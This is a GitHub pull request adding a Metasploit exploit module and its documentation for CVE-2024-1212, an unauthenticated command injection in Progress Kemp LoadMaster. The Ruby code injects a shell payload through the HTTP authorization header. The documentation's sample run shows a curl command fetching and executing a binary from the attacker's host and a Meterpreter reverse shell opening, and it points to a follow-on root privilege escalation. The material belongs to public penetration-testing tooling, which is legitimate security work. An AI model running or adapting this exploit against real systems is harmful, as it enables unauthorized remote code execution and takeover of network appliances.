New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Progress LoadMaster unauthenticated command injection module CVE-2024-1212 #18972
Merged
6 commits merged into
rapid7:master
from
DaveYesland:module/progress_kemp_loadmaster_unauth_cmd_injection
Apr 26, 2024
Merged
Changes from 5 commits
Commits
Show all changes
6 commits
Select commit
Hold shift + click to select a range
e32d05e
Add module and docs for CVE-2024-1212
DaveYesland 1a8233d
msftidy cleanup
DaveYesland 409f0e4
Remove Priv Esc to add it to another module and update it to only run…
bwatters-r7 c10bde9
Merge branch 'rapid7:master' into module/progress_kemp_loadmaster_una…
DaveYesland a362440
Merge pull request #1 from bwatters-r7/update-18972
DaveYesland 02c3115
Add vulnerable versions and fix indention
bwatters-r7 File filter
Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
There are no files selected for viewing
97 changes: 97 additions & 0 deletions
97
...ion/modules/exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,97 @@ | ||
## Vulnerable Application | ||
CVE-2024-1212: Progress Kemp LoadMaster Unauthenticated Command Injection | ||
|
||
For more details on the vulnerability: | ||
https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/ | ||
|
||
https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212 | ||
|
||
A trial VM which the exploit should work against out of the box can be downloaded from: | ||
https://sso.kemptechnologies.com/register/kemp/vlm | ||
|
||
The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth. | ||
https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw | ||
|
||
## Verification Steps | ||
1. Install the application | ||
1. Start msfconsole | ||
1. Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection` | ||
1. Do: `set RHOSTS <target loadmaster>` | ||
1. Do: `set RPORT <port loadmaster is running on>` | ||
1. Do: `set LHOST <your host IP>` | ||
1. Do: `run` | ||
1. You should get a shell as the `bal` user. | ||
1. (Optional) use the module `exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024` to gain root privileges. | ||
1. (Optional) use the script `run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc` to automatically run the above module. | ||
|
||
## Scenarios | ||
|
||
### LoadMaster 7.2.59.0.22007 | ||
|
||
``` msf | ||
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > show options | ||
|
||
Module options (exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
RHOSTS 10.5.134.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met | ||
asploit.html | ||
RPORT 443 yes The target port (TCP) | ||
SSL true no Negotiate SSL/TLS for outgoing connections | ||
TARGETURI / yes The URI path to LoadMaster | ||
VHOST no HTTP server virtual host | ||
|
||
|
||
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) | ||
FETCH_DELETE false yes Attempt to delete the binary after execution | ||
FETCH_FILENAME GyzwtIbxq no Name to use on remote system when storing payload; cannot contain spaces or slash | ||
es | ||
FETCH_SRVHOST no Local IP to use for serving payload | ||
FETCH_SRVPORT 8080 yes Local port to use for serving payload | ||
FETCH_URIPATH no Local URI to use for serving payload | ||
FETCH_WRITABLE_DIR /tmp/ yes Remote writable dir to store payload; cannot contain spaces | ||
LHOST 10.5.135.201 yes The listen address (an interface may be specified) | ||
LPORT 4444 yes The listen port | ||
|
||
|
||
Exploit target: | ||
|
||
Id Name | ||
-- ---- | ||
0 Automatic | ||
|
||
|
||
|
||
View the full module info with the info, or info -d command. | ||
|
||
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > run | ||
|
||
[*] Command to run on remote host: curl -so /tmp/LlipoMVy http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/LlipoMVy; /tmp/LlipoMVy & | ||
[*] Fetch handler listening on 10.5.135.201:8080 | ||
[*] HTTP server started | ||
[*] Adding resource /RByzlSnTzclKDpvXskXIrg | ||
[*] Started reverse TCP handler on 10.5.135.201:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Checking if 10.5.134.141:443 is vulnerable... | ||
[+] The target is vulnerable. | ||
[*] Sending payload... | ||
[*] Client 10.5.134.141 requested /RByzlSnTzclKDpvXskXIrg | ||
[*] Sending payload to 10.5.134.141 (curl/7.77.0) | ||
[+] Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell | ||
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.141:29264) at 2024-04-12 17:08:57 -0500 | ||
|
||
meterpreter > sysinfo | ||
Computer : 10.5.134.141 | ||
OS : SuSE 7.2 (Linux 4.14.137) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
meterpreter > getuid | ||
Server username: bal | ||
``` |
131 changes: 131 additions & 0 deletions
131
modules/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,131 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
prepend Msf::Exploit::Remote::AutoCheck | ||
def flag_file | ||
return @flag_file unless @flag_file.nil? | ||
|
||
@flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5) | ||
end | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Kemp LoadMaster Unauthenticated Command Injection', | ||
'Description' => %q{ | ||
This module exploits an unauthenticated command injection vulnerability in | ||
Progress Kemp LoadMaster in the authorization header. | ||
}, | ||
'Author' => [ | ||
'Dave Yesland with Rhino Security Labs', | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => [ | ||
['CVE', '2024-1212'], | ||
['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'], | ||
['URL', 'https://kemptechnologies.com/kemp-load-balancers'] | ||
], | ||
'DisclosureDate' => '2024-03-19', | ||
'Notes' => { | ||
'Stability' => [ CRASH_SAFE ], | ||
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], | ||
'Reliability' => [ REPEATABLE_SESSION ] | ||
}, | ||
'Platform' => ['unix', 'linux'], | ||
'Arch' => [ARCH_CMD], | ||
'Privileged' => false, | ||
'Targets' => [ | ||
[ | ||
'Automatic', # Add logic to run the payload only once | ||
{ | ||
'Payload' => { | ||
'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ", | ||
'Append' => ')', | ||
'BadChars' => "\x3a\x27" | ||
} | ||
} | ||
], | ||
[ | ||
'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions | ||
{ | ||
'Payload' => { | ||
'BadChars' => "\x3a\x27" | ||
} | ||
} | ||
] | ||
], | ||
'Default_target' => 0, | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', | ||
'FETCH_WRITABLE_DIR' => '/tmp/', | ||
'SSL' => true, | ||
'RPORT' => 443 | ||
} | ||
) | ||
) | ||
|
||
register_options([ | ||
OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/']) | ||
]) | ||
end | ||
|
||
def exploit | ||
uri = normalize_uri(target_uri.path, 'access', 'set') | ||
|
||
vprint_status('Sending payload...') | ||
|
||
send_request_cgi({ | ||
'method' => 'GET', | ||
'uri' => uri, | ||
'vars_get' => | ||
{ | ||
'param' => 'enableapi', | ||
'value' => '1' | ||
}, | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. This indentation seems like something rubocop should have complained about There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. |
||
'authorization' => basic_auth("';#{payload.encoded};echo '", Rex::Text.rand_text_alpha(rand(8..15))), | ||
'verify' => false | ||
}) | ||
end | ||
|
||
def on_new_session(client) | ||
super | ||
print_good('Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell') | ||
end | ||
|
||
def check | ||
print_status("Checking if #{peer} is vulnerable...") | ||
|
||
uri = normalize_uri(target_uri.path, 'access', 'set') | ||
|
||
res = send_request_cgi({ | ||
'method' => 'GET', | ||
'uri' => uri, | ||
'vars_get' => { | ||
'param' => 'enableapi', | ||
'value' => '1' | ||
}, | ||
'authorization' => basic_auth("'", Rex::Text.rand_text_alpha(rand(8..15))), | ||
'verify' => false | ||
}) | ||
|
||
# No response from server | ||
unless res | ||
return CheckCode::Unknown | ||
end | ||
|
||
# Check for specific error pattern in headers or body to confirm vulnerability | ||
if res.headers.to_s.include?('unexpected EOF while looking for matching') || res.body.include?('unexpected EOF while looking for matching') | ||
return CheckCode::Vulnerable | ||
else | ||
return CheckCode::Safe | ||
end | ||
end | ||
|
||
end |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Just adding affected / patched version info to the Description.